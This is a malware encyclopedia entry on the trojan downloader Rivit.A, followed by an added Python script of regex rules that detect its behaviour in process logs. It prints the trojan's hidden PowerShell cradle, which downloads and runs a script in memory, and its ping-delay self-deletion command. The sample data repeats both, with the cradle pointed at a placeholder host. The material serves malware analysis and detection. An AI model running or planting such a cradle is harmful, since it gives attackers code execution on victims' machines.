TrojanDownloader:Win32/Rivit.A!dha
First posted on 15 April 2017.
Source: Microsoft
Aliases:
There are no other names known for TrojanDownloader:Win32/Rivit.A!dha.
Explanation:
This trojan opens a PowerShell process to download and run a file from a remote host. The process is started with no profile (-nop) and a hidden window (-w hidden); it builds a WebClient that uses the system proxy and the current user's default credentials, then passes the downloaded string straight to IEX (Invoke-Expression), so the fetched script runs in memory without being written to disk. The download URL is not reproduced on this page.
- powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring();
The trojan then uses a command prompt process to run a command that deletes the malware file. As part of the command, it pings an address in the private 192.168.0.0/16 range (192.168.0.1 to 192.168.255.254): with -n 1 it sends a single echo request, and with -w 2000 it waits up to 2000 ms for a reply. Because the address is unlikely to answer, the ping acts as a roughly two-second delay, giving the malware's own process time to exit (a running executable cannot be deleted on Windows) before del runs.
We have seen it use the following command and IP address:
- cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del
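As an added example (this is not code from the original page or from Microsoft's analysis), the following Python detection logic turns the two behaviours described above, the hidden-window PowerShell download cradle and the ping-delay-then-delete cleanup, into rules run over process command lines. The sample command lines are constructed for this example and stand in for the command-line field of Sysmon Event ID 1 or Windows Security event 4688; the URL, the file paths, the benign look-alike lines, and the rule and function names are all assumptions made here.

```python
import ipaddress
import re
from typing import List

# Constructed sample process-creation command lines for this example (they are
# not from the original page or from Microsoft's analysis). The first two mirror
# the two behaviours described above; the remaining three are benign look-alikes
# that the rules must not flag. The URL and file paths are placeholders.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -nop -w hidden -c $J=new-object net.webclient;'
    '$J.proxy=[Net.WebRequest]::GetSystemWebProxy();'
    '$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;'
    'IEX $J.downloadstring("http://example.invalid/payload")',
    'cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del '
    '"C:\\Users\\user\\AppData\\Local\\Temp\\dropper.exe"',
    'powershell.exe -NoProfile -Command Get-Process',
    'cmd.exe /c ping -n 4 -w 2000 192.168.123.254',
    'cmd.exe /c del "C:\\Temp\\old.log"',
]

# PowerShell launched with no profile and a hidden window (-nop -w hidden).
HIDDEN_NOPROFILE = re.compile(
    r'powershell(?:\.exe)?\b.*?-nop(?:rofile)?\b.*?-w(?:indowstyle)?\s+hidden\b',
    re.IGNORECASE | re.DOTALL,
)

# WebClient download cradle: a WebClient whose DownloadString result is handed
# to IEX / Invoke-Expression, i.e. the fetched script runs in memory.
DOWNLOAD_CRADLE = re.compile(
    r'net\.webclient.*?(?:\bIEX\b|Invoke-Expression).*?downloadstring',
    re.IGNORECASE | re.DOTALL,
)

# "ping -n <count> / -w <ms> <ip> ... & del": a ping used purely as a sleep
# before a file is deleted. The IPv4 address is captured for a range check.
PING_DELAY_DELETE = re.compile(
    r'\bping\b[^&|]*?-[nw]\s+\d+[^&|]*?'
    r'\b(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\b[^&|]*?&\s*del\b',
    re.IGNORECASE,
)


def classify(cmdline: str) -> List[str]:
    """Return the names of the indicators matched by one process command line."""
    findings = []
    if HIDDEN_NOPROFILE.search(cmdline):
        findings.append("hidden_noprofile_powershell")
    if DOWNLOAD_CRADLE.search(cmdline):
        findings.append("powershell_download_cradle")
    m = PING_DELAY_DELETE.search(cmdline)
    if m:
        try:
            private = ipaddress.ip_address(m.group("ip")).is_private
        except ValueError:  # e.g. an octet above 255
            private = False
        # A private address that is unlikely to answer maximises the delay, as
        # in the sample command on this page, so it is reported separately.
        findings.append("ping_delay_self_delete_private_ip" if private
                        else "ping_delay_self_delete")
    return findings


def scan(cmdlines: List[str]) -> List[tuple]:
    """Return (index, findings) for every command line that matched a rule."""
    hits = []
    for i, line in enumerate(cmdlines):
        found = classify(line)
        if found:
            hits.append((i, found))
    return hits


if __name__ == "__main__":
    for idx, found in scan(SAMPLE_COMMAND_LINES):
        print(f"[{idx}] {', '.join(found)}: {SAMPLE_COMMAND_LINES[idx][:70]}...")
```

The ping rule deliberately requires the `& del` that follows the ping; a ping to a private address on its own is routine on most networks, and the cleanup pattern is what makes this one suspicious. Run the rules against the parent/child relationship as well where the telemetry allows it: the page describes both commands being spawned by the trojan itself.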
Analysis by Mathieu Letourneau
Last update 15 April 2017